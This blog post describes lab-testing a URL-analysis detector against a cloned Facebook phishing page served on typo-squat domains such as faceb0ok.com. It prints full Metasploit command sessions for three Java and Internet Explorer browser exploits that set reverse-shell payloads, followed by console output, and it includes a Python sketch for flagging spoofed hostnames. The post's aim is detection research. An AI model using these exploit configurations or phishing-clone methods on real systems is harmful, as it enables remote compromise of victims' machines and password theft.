In continuation of the previous blog post, where I gave a sneak preview of the Statistical URL Analyzer, in this article we shall briefly look at MetaSploit and SET, two of the most widely used kits for generating payloads laced with exploits, deploying them and eventually exploiting the target systems. Our use of MetaSploit is limited to testing the SURL Analyzer and simulating real-world scenarios.
Speaking of MetaSploit reminds me of a very recent attack on two Nepalese Government websites, which were compromised and used to serve a drive-by download. The full report can be viewed here. In their research they found that the malware JAR was created using MetaSploit.
A snippet of the report, highlighting the use of MetaSploit:
“… It’s interesting to note that all those compromises had injected code that was taken from the Metasploit framework, served in clear form, and not obfuscated. Although the use of code from the Metasploit framework doesn’t necessarily indicate a link between all the compromises …”
For testing the Statistical URL Analyzer, we set up virtual machines with BackTrack 5 and created a few payloads consisting of phishing pages and exploit-laced pages, all served via a cloned website.
In the example below, we have cloned facebook.com for two purposes:
1: To create a malicious page which will infect the victim's machine
2: To capture passwords; in the real world this would be nothing less than a phishing website
While simulating a real-world scenario, it is important to know that:
1: A genuine website is hacked using various methods and malicious code is inserted into it.
2: A fake domain, similar to the domain whose users are being targeted, is registered; a web server is deployed and the trap is set. E.g. www.faceb0ok.com
3: Sometimes we come across URLs with seemingly long domains such as www.facebook.com.fake.domain.com. These domains are mostly targeted at smartphone users: when viewing the link, a smartphone user sees only the first few characters of the whole domain, which gives a false sense that they are visiting hxxp://www.facebook.com. In this scenario, additional sub-domains are created to spoof the actual domain.
To ensure the effectiveness and test the rigidity of the algorithm, we modified the hosts file and added the fake domain entries to it. This effectively ensures that, from the test machine, facebook.com points to the lab server, because entries in the hosts file take precedence over domain resolution via a DNS server. This was done to simulate the real-world scenario.
Eg. 1: entry in hosts file '127.0.0.1 www.facebrok.com'
Eg. 2: entry in hosts file '127.0.0.1 www.faceb0ok.com'
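As an added example (not part of the original post and not SURL's own algorithm), the following Python sketch flags hostnames that match the three spoofing patterns described above: the brand domain buried in the sub-domain part, digit-for-letter look-alikes such as faceb0ok.com, and typo-squats such as facebrok.com. The brand allow-list, the substitution table and the edit-distance threshold are assumptions made for this example.

```python
"""Added example (not SURL's own algorithm): classify a URL's hostname against
the three spoofing patterns described in the post. Brand list and thresholds
are assumptions made for this example."""
from urllib.parse import urlsplit

# Constructed allow-list of legitimate registrable domains (assumption).
KNOWN_BRANDS = ("facebook.com", "google.com", "paypal.com")

# Digit/symbol swaps commonly used to build look-alike labels (assumption).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "@": "a"})

def registrable_domain(host: str) -> str:
    """Last two labels: 'www.facebook.com.fake.domain.com' -> 'domain.com'.
    A production check would consult the Public Suffix List instead."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small distance to a brand label suggests a typo-squat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(url: str) -> str:
    """Return 'legit', 'subdomain-spoof', 'lookalike', 'typo' or 'unknown'."""
    if "//" not in url:            # accept bare hostnames as well as URLs
        url = "//" + url
    host = (urlsplit(url).hostname or "").lower()
    reg = registrable_domain(host)
    if reg in KNOWN_BRANDS:
        return "legit"
    reg_label = reg.split(".")[0]
    for brand in KNOWN_BRANDS:
        label = brand.split(".")[0]
        # 1. the whole brand domain appears as a sub-domain of another domain
        if f".{brand}." in f".{host}.":
            return "subdomain-spoof"
        # 2. the registrable label equals the brand once digit swaps are undone
        if reg_label.translate(HOMOGLYPHS) == label:
            return "lookalike"
        # 3. the registrable label is within two edits of the brand (facebrok)
        if levenshtein(reg_label, label) <= 2:
            return "typo"
    return "unknown"
```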
MetaSploit Configuration for various vulnerabilities
Exploit 1
CVE: 2012-4681
OSVDB: 84867
Reference: Link
MetaSploit Commands
msf exploit(java_jre17_exec)> use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec)> set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp
msf exploit(java_jre17_exec)> set LHOST 192.168.5.200
LHOST => 192.168.5.200
msf exploit(java_jre17_exec)> set SRVPORT 80
SRVPORT => 80
msf exploit(java_jre17_exec)> set URIPATH /
URIPATH => /
msf exploit(java_jre17_exec)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444
[*] Using URL: https://0.0.0.0:80/
[*] Local IP: https://192.168.5.200:80/
[*] Server started.
Exploit 2
CVE: 2012-1723
OSVDB: 82877
BID: 52161
Reference: Link
MetaSploit Commands
msf exploit(java_verifier_field_access)> use exploit/multi/browser/java_verifier_field_access
msf exploit(java_verifier_field_access)> set TARGET 1
TARGET => 1
msf exploit(java_verifier_field_access)> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(java_verifier_field_access)> set LHOST 192.168.5.200
LHOST => 192.168.5.200
msf exploit(java_verifier_field_access)> set SRVPORT 80
SRVPORT => 80
msf exploit(java_verifier_field_access)> set URIPATH /1
URIPATH => /1
msf exploit(java_verifier_field_access)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444
[*] Using URL: https://0.0.0.0:80/1
[*] Local IP: https://192.168.5.200:80/1
[*] Server started.
Exploit 3
CVE: 2012-4969
OSVDB: 85532
MSB: MS12-063
Reference: Link
MetaSploit Commands
msf exploit(ie_execcommand_uaf)> use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_execcommand_uaf)> set LHOST 192.168.5.200
LHOST => 192.168.5.200
msf exploit(ie_execcommand_uaf)> set SRVPORT 80
SRVPORT => 80
msf exploit(ie_execcommand_uaf)> set URIPATH /2
URIPATH => /2
msf exploit(ie_execcommand_uaf)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444
[*] Using URL: https://0.0.0.0:80/2
[*] Local IP: https://192.168.5.200:80/2
[*] Server started.
The goal of this exercise was to see whether SURL Analyzer detects these pages as malicious. The reasoning is simple: if a page can be detected, it can be blocked. Detection here is based solely on the algorithm, not on a database of known malicious URLs.
Result 1:
Checking : https://www.facebrok.com
action = 0
0-scripts-0
ApInv=1 #Mal
Results=1
Analysis Time=0.00176063379471494 seconds
Total Time=0.0274778485256021 seconds
#ToolKit #Result =1
Dmn: h00p://www.facebrok.com
RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_195848.txt
MetaSploit Console Output:
[*] 192.168.5.200 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
Result 2:
Checking : https://www.facebrok.com/1
Server Header REDIRECTING to : /1/
action = 0
0-scripts-0
JAsz=1 #Mal
JAc=1 #Mal
Results=2
Analysis Time=0.196207084964831 seconds
Total Time=1.67632544065315 seconds
#ToolKit #Result =2
Dmn: h00p://www.facebrok.com
RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200158.txt
MetaSploit Console Output:
[*] 192.168.5.200 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.5.200 java_verifier_field_access - Generated executable to drop (73802 bytes).
Result 3:
Checking : https://www.facebrok.com/2
Server Header REDIRECTING to : /2/TgolD.html
Downloading Frame : www.facebrok.com/2/EpjstT.html
Sc1=1 #Mal
FR?Nor=1
DHx=1
Results=2
Analysis Time=0.0272505794048455 seconds
Total Time=0.112398237387382 seconds
#ToolKit #Result =2
Dmn: h00p://www.facebrok.com
RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200417.txt
MetaSploit Console Output:
[*] 192.168.5.200 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200 ie_execcommand_uaf - Redirecting to TgolD.html
[*] 192.168.5.200 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200 ie_execcommand_uaf - Loading TgolD.html
[*] 192.168.5.200 ie_execcommand_uaf - Using msvcrt ROP
[*] 192.168.5.200 ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200 ie_execcommand_uaf - Loading EpjstT.html
The next blog post will contain my explanation of the internal workings of SURL Analyzer. Till then – Stay Safe.